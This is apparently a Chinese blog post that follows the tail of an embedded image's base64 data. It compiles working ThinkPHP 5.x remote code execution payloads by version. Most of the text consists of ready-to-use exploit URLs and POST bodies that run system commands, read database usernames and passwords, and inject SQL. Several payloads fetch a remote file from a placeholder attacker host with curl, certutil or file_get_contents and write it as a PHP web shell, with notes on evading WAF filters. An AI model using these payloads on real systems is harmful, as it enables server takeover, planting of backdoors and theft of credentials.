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" alt="" width="482" height="258" />

漏洞poc:

https://github.com/heroanswer/thinkphp_rce_poc

-----------------------

于2020.01.20补充

在公众号上发现有人对thinkphp 5.x.x 的漏洞poc进行了总结

Thinkphp 5.0.5

waf对eval进行了拦截
禁止了assert函数
对eval函数后面的括号进行了正则过滤
对file_get_contents函数后面的括号进行了正则过滤
http://www.xxxx.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

Thinkphp 5.0.11

http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php

Thinkphp 5.0.14

eval（''）和assert（''）被拦截，命令函数被禁止
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo();
http://www.xxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_GET[1])&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));

php7.
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.txt&vars[1][1]=1
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index111.php',file_get_contents('https://www.hack.com/xxx.js'));?>
写进去发现转义了尖括号
通过copy函数
http://www.xxxx.cn/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]= https://www.hack.com/xxx.js&vars[1][1]=112233.php

Thinkphp 5.0.18

windows
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo()

使用certutil
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=passthru&vars[1][0]=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php
由于根目录没写权限，所以写到uploads

Thinkphp 5.1.* 和 5.2.* 和 5.0.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

Thinkphp 5.0.10（完整版）

(post)public/index.php?s=index/index/index 
(data)s=whoami&_method=__construct&method&filter[]=system

Thinkphp 5.0.21

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Thinkphp 5.0.22

http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha 
(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

Thinkphp 5.0.23（完整版）Debug 模式

(post)public/index.php 
(data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%/tmp/xxx

Thinkphp 5.1.*

http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

Thinkphp 5.1.18

http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index_bak2.php',file_get_contents('https://www.hack.com/xxx.js'));?>

所有目录都无写权限,base64函数被拦截
http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_POST[1])

Thinkphp 未知版本

?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
index.php?s=/home/shopcart/getPricetotal/tag/%
index.php?s=/home/shopcart/getpriceNum/id/%
index.php?s=/home/user/cut/id/%
index.php?s=/home/service/index/id/%
index.php?s=/home/pay/chongzhi/orderid/%
index.php?s=/home/pay/index/orderid/%
index.php?s=/home/order/complete/id/%
index.php?s=/home/order/complete/id/%
index.php?s=/home/order/detail/id/%
index.php?s=/home/order/cancel/id/%
index.php?s=/home/pay/index/orderid/%)%20UNION%20ALL%20SELECT%20md5()--+

POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"') union select sleep('''+str(sleep_time)+''')#

当 Php7 以上无法使用 Assert 的时候用

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();
有上传图片或者日志用这个包含就可以

参考链接：
https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg
http://www.thinkphp.cn/topic/60400.html
http://www.thinkphp.cn/topic/60390.html
https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

http://www.rai4over.cn/2018/12/12/Thinkphp5-x%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/